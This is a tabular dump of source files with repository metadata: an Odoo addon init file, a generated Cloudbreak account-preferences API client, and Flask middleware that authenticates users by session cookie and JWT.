hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4cb9874c6e8040d1d49fb16e53085ae6696afc16
| 188
|
py
|
Python
|
deltatech_payment_to_statement/models/__init__.py
|
NextERP-Romania/addons_extern
|
d08f428aeea4cda1890adfd250bc359bda0c33f3
|
[
"Apache-2.0"
] | null | null | null |
deltatech_payment_to_statement/models/__init__.py
|
NextERP-Romania/addons_extern
|
d08f428aeea4cda1890adfd250bc359bda0c33f3
|
[
"Apache-2.0"
] | null | null | null |
deltatech_payment_to_statement/models/__init__.py
|
NextERP-Romania/addons_extern
|
d08f428aeea4cda1890adfd250bc359bda0c33f3
|
[
"Apache-2.0"
] | null | null | null |
# © 2015-2020 Deltatech
# See README.rst file on addons root folder for license details
from . import account_payment
from . import account_journal
from . import account_bank_statement
| 23.5
| 63
| 0.797872
| 28
| 188
| 5.25
| 0.785714
| 0.204082
| 0.346939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050633
| 0.159574
| 188
| 7
| 64
| 26.857143
| 0.873418
| 0.446809
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
98079364bc302a03a77299e4ab18353dfada647d
| 23,418
|
py
|
Python
|
whoville/cloudbreak/apis/v1accountpreferences_api.py
|
balazsgaspar/whoville
|
0d26853bf5cfd3485067b0c23f886e2b4ab742f8
|
[
"Apache-2.0"
] | 30
|
2017-06-12T13:05:24.000Z
|
2021-08-03T09:00:48.000Z
|
whoville/cloudbreak/apis/v1accountpreferences_api.py
|
balazsgaspar/whoville
|
0d26853bf5cfd3485067b0c23f886e2b4ab742f8
|
[
"Apache-2.0"
] | 6
|
2017-12-27T23:12:45.000Z
|
2019-03-07T22:14:24.000Z
|
whoville/cloudbreak/apis/v1accountpreferences_api.py
|
balazsgaspar/whoville
|
0d26853bf5cfd3485067b0c23f886e2b4ab742f8
|
[
"Apache-2.0"
] | 31
|
2017-06-12T13:05:28.000Z
|
2019-09-20T01:50:29.000Z
|
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.9.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class V1accountpreferencesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_account_preferences_endpoint(self, **kwargs):
"""
retrieve account preferences for admin user
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_account_preferences_endpoint(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: AccountPreferencesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_account_preferences_endpoint_with_http_info(**kwargs)
else:
(data) = self.get_account_preferences_endpoint_with_http_info(**kwargs)
return data
def get_account_preferences_endpoint_with_http_info(self, **kwargs):
"""
retrieve account preferences for admin user
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_account_preferences_endpoint_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: AccountPreferencesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_account_preferences_endpoint" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/accountpreferences', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPreferencesResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def is_platform_selection_disabled(self, **kwargs):
"""
is platform selection disabled
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.is_platform_selection_disabled(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: dict(str, bool)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.is_platform_selection_disabled_with_http_info(**kwargs)
else:
(data) = self.is_platform_selection_disabled_with_http_info(**kwargs)
return data
def is_platform_selection_disabled_with_http_info(self, **kwargs):
"""
is platform selection disabled
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.is_platform_selection_disabled_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: dict(str, bool)
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method is_platform_selection_disabled" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/accountpreferences/isplatformselectiondisabled', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, bool)',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def platform_enablement(self, **kwargs):
"""
is platform selection enabled
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.platform_enablement(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: dict(str, bool)
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.platform_enablement_with_http_info(**kwargs)
else:
(data) = self.platform_enablement_with_http_info(**kwargs)
return data
def platform_enablement_with_http_info(self, **kwargs):
"""
is platform selection enabled
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.platform_enablement_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: dict(str, bool)
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method platform_enablement" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/accountpreferences/platformenabled', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='dict(str, bool)',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_account_preferences_endpoint(self, **kwargs):
"""
post account preferences of admin user
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_account_preferences_endpoint(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param AccountPreferencesRequest body:
:return: AccountPreferencesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.post_account_preferences_endpoint_with_http_info(**kwargs)
else:
(data) = self.post_account_preferences_endpoint_with_http_info(**kwargs)
return data
def post_account_preferences_endpoint_with_http_info(self, **kwargs):
"""
post account preferences of admin user
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_account_preferences_endpoint_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param AccountPreferencesRequest body:
:return: AccountPreferencesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_account_preferences_endpoint" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/accountpreferences', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPreferencesResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_account_preferences_endpoint(self, **kwargs):
"""
update account preferences of admin user
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_account_preferences_endpoint(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param AccountPreferencesRequest body:
:return: AccountPreferencesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.put_account_preferences_endpoint_with_http_info(**kwargs)
else:
(data) = self.put_account_preferences_endpoint_with_http_info(**kwargs)
return data
def put_account_preferences_endpoint_with_http_info(self, **kwargs):
"""
update account preferences of admin user
Account related preferences that could be managed by the account admins and different restrictions could be added to Cloudbreak resources.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.put_account_preferences_endpoint_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param AccountPreferencesRequest body:
:return: AccountPreferencesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_account_preferences_endpoint" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/v1/accountpreferences', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPreferencesResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.206642
| 984
| 0.590529
| 2,322
| 23,418
| 5.729113
| 0.105512
| 0.060137
| 0.041043
| 0.027062
| 0.900849
| 0.881906
| 0.881906
| 0.864542
| 0.854168
| 0.845599
| 0
| 0.000776
| 0.339611
| 23,418
| 541
| 985
| 43.286506
| 0.859425
| 0.379195
| 0
| 0.807692
| 0
| 0
| 0.138452
| 0.052328
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042308
| false
| 0
| 0.026923
| 0
| 0.130769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e24d5584c8a27007fc5a436027f4c7c4cb24732d
| 12,670
|
py
|
Python
|
services/simcct/sim_api/middleware.py
|
NeuralDev-io/arclytics_simcct
|
e04eaa315c76b0295d3d7450cf59b8b0b4a7f22b
|
[
"MIT"
] | 2
|
2020-01-18T04:59:29.000Z
|
2020-01-20T23:16:58.000Z
|
services/simcct/sim_api/middleware.py
|
NeuralDev-io/arclytics_simcct
|
e04eaa315c76b0295d3d7450cf59b8b0b4a7f22b
|
[
"MIT"
] | 1
|
2022-02-10T20:55:13.000Z
|
2022-02-10T20:55:13.000Z
|
services/simcct/sim_api/middleware.py
|
NeuralDev-io/arclytics_simcct
|
e04eaa315c76b0295d3d7450cf59b8b0b4a7f22b
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------------------------------------------------
# arclytics_sim
# middleware.py
#
# Attributions:
# [1]
# ----------------------------------------------------------------------------------------------------------------------
__author__ = [
'Andrew Che <@codeninja55>', 'David Matthews <@tree1004>',
'Dinol Shrestha <@dinolsth>'
]
__license__ = 'MIT'
__version__ = '1.0.0'
__status__ = 'production'
__date__ = '2019.07.06'
"""middleware.py:
This is the request middleware that ensures every single request is checked
for cookies and authentication or authorisation based on the endpoint View
methods used.
"""
from functools import wraps
from threading import Thread
from bson import ObjectId
from flask import json, jsonify, request, session
from mongoengine import DoesNotExist
from arc_logging import AppLogger
from sim_api.extensions.Session.redis_session import SESSION_COOKIE_NAME
from sim_api.extensions import apm
from sim_api.models import User
from sim_api.auth_service import AuthService
logger = AppLogger(__name__)
def async_func(f):
"""Threading decorator if you want to make a method use separate thread."""
@wraps(f)
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
# ========================== # FLASK VERSIONS # ============================= #
def authenticate_user_and_cookie_flask(f):
"""A wrapper decorator as a middleware to authenticate if the user has a
cookie in their request. This will check the cookie and session is available
for the user before it allows any actions on the back-end.
Args:
f: the endpoint View method to run that is being wrapped.
Returns:
the `sim_api.models.User` object if found.
"""
@wraps(f)
def decorated_func(*args, **kwargs):
response = {'status': 'fail', 'message': 'Session token is not valid.'}
# Get the session key from the cookies
session_key = request.cookies.get(SESSION_COOKIE_NAME)
if not session_key:
return jsonify(response), 401
if not session:
response['message'] = 'Session is invalid.'
return jsonify(response), 401
# Extract the JWT from the session which we stored at login
auth_token = session.get('jwt', None)
if auth_token is None:
response['message'] = 'No JWT stored in Session.'
return jsonify(response), 500
# Decode either returns bson.ObjectId if successful or a string from an
# exception
resp = AuthService().decode_auth_token(auth_token=auth_token)
# Either returns an ObjectId User ID or a string response.
if not isinstance(resp, ObjectId):
response['message'] = resp
return jsonify(response), 401
# Validate the user is active
try:
user = User.objects.get(id=resp)
except DoesNotExist as e:
response['error'] = str(e)
response['message'] = 'User does not exist.'
logger.exception(response['message'])
apm.capture_exception()
return jsonify(response), 404
if not user.active:
response['message'] = 'This user account has been disabled.'
logger.info(
json.dumps(
{
"message": response['message'],
"user": user.email
}
)
)
apm.capture_message('Unauthorised access.')
return jsonify(response), 403
return f(user, *args, **kwargs)
return decorated_func
def authorize_admin_cookie_flask(f):
"""A wrapper decorator as a middleware to authenticate if the user has a
cookie in their request. This will check the cookie and session is
available for the user before it allows any actions on the back-end.
Additionally, it also checks if the user is an admin and allows to perform
actions on admin authorized endpoints.
Args:
f: the endpoint View method to run that is being wrapped.
Returns:
the `sim_api.models.User` object if found.
"""
@wraps(f)
def decorated_func(*args, **kwargs):
response = {'status': 'fail', 'message': 'Session token is not valid.'}
# Get the session key from the cookies
session_key = request.cookies.get(SESSION_COOKIE_NAME)
if not session_key:
return jsonify(response), 401
if not session:
response['message'] = 'Session is invalid.'
return jsonify(response), 401
# Extract the JWT from the session which we stored at login
auth_token = session.get('jwt', None)
if auth_token is None:
response['message'] = 'No JWT stored in Session.'
return jsonify(response), 500
# Decode either returns bson.ObjectId if successful or a string
# from an exception
resp = AuthService().decode_auth_token(auth_token=auth_token)
# Either returns an ObjectId User ID or a string response.
if not isinstance(resp, ObjectId):
response['message'] = resp
logger.info(resp)
apm.capture_message('Invalid Auth token.')
return jsonify(response), 401
# Validate the user is active
try:
user = User.objects.get(id=resp)
except DoesNotExist as e:
response['error'] = str(e)
response['message'] = 'User does not exist.'
logger.exception(response['message'], exc_info=True)
apm.capture_exception()
return jsonify(response), 404
if not user.active:
response['message'] = 'This user account has been disabled.'
logger.info(
json.dumps(
{
"message": response['message'],
"user": user.email
}
)
)
apm.capture_message('Unauthorised access.')
return jsonify(response), 403
if not user.is_admin:
response['message'] = 'Not authorized.'
logger.info(
json.dumps(
{
"message": response['message'],
"user": user.email
}
)
)
# Must capture message because there is no exception in this
# case which is a bug if Python APM Agent.
# https://github.com/elastic/apm-agent-python/issues/599
apm.capture_message('Unauthorised admin access.')
return jsonify(response), 403
return f(user, *args, **kwargs)
return decorated_func
# ======================== # RESTFUL VERSIONS # ============================= #
def authenticate_user_cookie_restful(f):
"""A wrapper decorator as a middleware to authenticate if the user has a
cookie in their request. This will check the cookie and session is available
for the user before it allows any actions on the back-end.
Args:
f: the endpoint View method to run that is being wrapped.
Returns:
the `sim_api.models.User` object if found.
"""
@wraps(f)
def decorated_func(*args, **kwargs):
response = {'status': 'fail', 'message': 'Session token is not valid.'}
# Get the session key from the cookies
session_key = request.cookies.get(SESSION_COOKIE_NAME)
if not session_key:
return response, 401
if not session:
response['message'] = 'Session is invalid.'
return response, 401
# Extract the JWT from the session which we stored at login
auth_token = session.get('jwt', None)
if auth_token is None:
response['message'] = 'No JWT stored in Session.'
return response, 500
# Decode either returns bson.ObjectId if successful or a string from an
# exception
resp = AuthService().decode_auth_token(auth_token=auth_token)
# Either returns an ObjectId User ID or a string response.
if not isinstance(resp, ObjectId):
response['message'] = resp
return response, 401
# Validate the user is active
try:
user = User.objects.get(id=resp)
except DoesNotExist as e:
response['error'] = str(e)
response['message'] = 'User does not exist.'
logger.exception(response['message'])
apm.capture_exception()
return response, 404
if not user.active:
response['message'] = 'This user account has been disabled.'
logger.info(
json.dumps(
{
"message": response['message'],
"user": user.email
}
)
)
# Must capture message because there is no exception in this
# case which is a bug if Python APM Agent.
# https://github.com/elastic/apm-agent-python/issues/599
apm.capture_message('Unauthorised access.')
return response, 403
return f(user, *args, **kwargs)
return decorated_func
def authorize_admin_cookie_restful(f):
"""A wrapper decorator as a middleware to authenticate if the user has a
cookie in their request. This will check the cookie and session is
available for the user before it allows any actions on the back-end.
Additionally, it also checks if the user is an admin and allows to perform
actions on admin authorized endpoints.
Args:
f: the endpoint View method to run that is being wrapped.
Returns:
the `sim_api.models.User` object if found.
"""
@wraps(f)
def decorated_func(*args, **kwargs):
response = {'status': 'fail', 'message': 'Session token is not valid.'}
# Get the session key from the cookies
session_key = request.cookies.get(SESSION_COOKIE_NAME)
if not session_key:
return response, 401
if not session:
response['message'] = 'Session is invalid.'
return response, 401
# Extract the JWT from the session which we stored at login
auth_token = session.get('jwt', None)
if auth_token is None:
response['message'] = 'No JWT stored in Session.'
return response, 500
# Decode either returns bson.ObjectId if successful or a string
# from an exception
resp = AuthService().decode_auth_token(auth_token=auth_token)
# Either returns an ObjectId User ID or a string response.
if not isinstance(resp, ObjectId):
response['message'] = resp
return response, 401
# Validate the user is active
try:
user = User.objects.get(id=resp)
except DoesNotExist as e:
response['error'] = str(e)
response['message'] = 'User does not exist.'
logger.exception(response['message'], exc_info=True)
apm.capture_exception()
return response, 404
if not user.active:
response['message'] = 'This user account has been disabled.'
logger.info(
json.dumps(
{
"message": response['message'],
"user": user.email
}
)
)
# Must capture message because there is no exception in this
# case which is a bug if Python APM Agent.
# https://github.com/elastic/apm-agent-python/issues/599
apm.capture_message('Unauthorised access.')
return response, 403
if not user.is_admin:
response['message'] = 'Not authorized.'
logger.info(
json.dumps(
{
"message": response['message'],
"user": user.email
}
)
)
# Must capture message because there is no exception in this
# case which is a bug if Python APM Agent.
# https://github.com/elastic/apm-agent-python/issues/599
apm.capture_message('Unauthorised admin access.')
return response, 403
return f(user, *args, **kwargs)
return decorated_func
| 35
| 120
| 0.573007
| 1,444
| 12,670
| 4.948061
| 0.136427
| 0.06718
| 0.038209
| 0.020154
| 0.869839
| 0.869839
| 0.869839
| 0.869839
| 0.869839
| 0.869839
| 0
| 0.012638
| 0.319258
| 12,670
| 361
| 121
| 35.096953
| 0.815768
| 0.295343
| 0
| 0.744076
| 0
| 0
| 0.13882
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047393
| false
| 0
| 0.047393
| 0
| 0.260664
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2c3cbf5c36b77eaefbc70f37bf14c8b53612b25a
| 153
|
py
|
Python
|
